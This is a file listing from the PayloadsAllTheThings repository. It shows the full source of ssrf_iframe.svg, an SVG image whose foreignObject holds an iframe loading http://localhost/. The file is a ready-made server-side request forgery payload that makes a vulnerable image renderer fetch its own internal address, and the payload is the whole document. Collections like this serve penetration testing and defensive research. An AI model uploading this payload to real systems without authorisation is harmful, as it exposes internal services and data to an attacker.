PayloadsAllTheThings/Server Side Request Forgery/Files/ssrf_iframe.svg
2019-04-07 23:40:36 +02:00

9 lines
No EOL
234 B
XML

<svg width="6000" height="6000">
<g>
<foreignObject width="6000" height="6000">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://localhost/"></iframe>
</body>
</foreignObject>
</g>
</svg>